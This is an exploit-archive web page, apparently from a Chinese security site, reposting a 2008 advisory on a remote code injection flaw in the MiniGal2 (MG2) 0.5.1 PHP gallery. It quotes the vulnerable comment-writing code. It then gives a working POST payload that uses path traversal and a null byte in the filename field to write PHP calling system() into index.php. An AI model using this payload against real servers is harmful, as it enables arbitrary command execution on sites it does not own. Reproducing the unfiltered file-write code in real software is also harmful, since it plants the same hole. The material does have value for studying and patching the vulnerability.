首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MG2 0.5.1 (filename) Remote Code Execution Vulnerability
来源:www.vfcocus.net 作者:Alfons Luja 发布时间:2008-12-09  
<?php 
/**********000000000000----------------------000\\\
/*-00--------++++++++++++++++++_______________)_)_________
-- --
   -    MiniGal2(MG2) v0.5.1 remote Code Injection    |
  ___     Z okazji urodzin ¿yczê sobie wszystkiego zajebistego
                 Zawsze na odwrót lol    '''''_---"
                    ___)()())0       ------------
     \                  A-L           |    """"""
      '--==9**        Victoria  heh      .
------       gr:SID.PSYCHO ;> and rest and ALL
       ---------++++++++++++=================))   
___ --             =======--
            ./..................
=======--////-
    VULN:[includes\mg2_functions.php]
    function writecomments($filename)  __LINE 555
  ---------
        function writecomments($filename) {
    $filename = "pictures/" . $filename;
             unset($buffer);
             if (count($this->comments) != 0) {
             for ($i=0; $i < count($this->comments); $i++){
             for ($j=0; $j < count($this->comments[$i]); $j++){
              $buffer .= "*" . $this->comments[$i][$j];
             }
              $buffer .= "\n";
             $fd = fopen($filename,"w+");
              if (flock($fd, LOCK_EX)) { // do an exclusive lock
              ftruncate($fd, 0);
              fwrite($fd, $buffer);
              flock($fd, LOCK_UN); // release the lock
              fclose($fd);
        $this->log("Wrote comment to '$filename'");
              } else {
        $this->log("ERROR: Could not lock commentfile '$filename' for writing");
              echo "MG2 ERROR: Could not lock $filename (function 'writecomments')";
             }
            }
         } else unlink($filename);
     }
         /\/\/\/\/\/\/\/\/\/\/\

        function addcomment() {
        $_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
        $_REQUEST['input'] = $this->charfix($_REQUEST['input']);
        $_REQUEST['email'] = $this->charfix($_REQUEST['email']);
        $_REQUEST['name'] = $this->charfix($_REQUEST['name']);
        $_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
        $_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
        $_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
        if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
         $this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
         $comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
         $comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
         $comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
         if (count($comment_exists) == 0) {
           $this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
           $this->writecomments($_REQUEST['filename'] . ".comment");
         .....etc //
................-------------------------------------------=====================
==== As you can se THE  input data is not enough filtered
      We can write self code in to the file
      by sending proper POSTS
      ex:
      POST input=a&name=/ <?php system('dir'); ?> // &email=c&action=addcomment&filename=../index.php%00&id=5
      THE END
    
-------*/
// ALFONS LUJA just 4 fUn :P
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SIU Guarani Multiple Remote Vu
·w3blabor CMS 3.0.5 Arbitrary F
·phpMyAdmin 3.1.0 (XSRF) SQL In
·PayPal eStore Admin Password C
·Simple Directory Listing 2 Cro
·Bonza Cart <= 1.10 Admin Passw
·XAMPP 1.6.8 (XSRF) Change Admi
·DL PayCart <= 1.34 Admin Passw
·phpBB 3 (Mod Tag Board <= 4) R
·IPNPro3 <= 1.44 Admin Password
·Neostrada Livebox Router Remot
·DesignWorks Professional 4.3.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved